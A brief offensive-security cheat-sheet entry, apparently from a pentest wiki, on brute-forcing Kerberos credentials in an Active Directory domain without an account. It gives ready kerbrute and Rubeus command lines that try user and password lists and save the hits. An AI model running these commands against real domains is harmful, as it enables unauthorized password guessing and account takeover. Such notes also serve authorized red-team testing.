Kerberos brute-force
No domain account is needed to conduct the attack
Linux
./kerbrute -domain hacktpor.local -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt

Windows
.\Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:jurassic.park /outfile:jurassic_passwords.txt

Last updated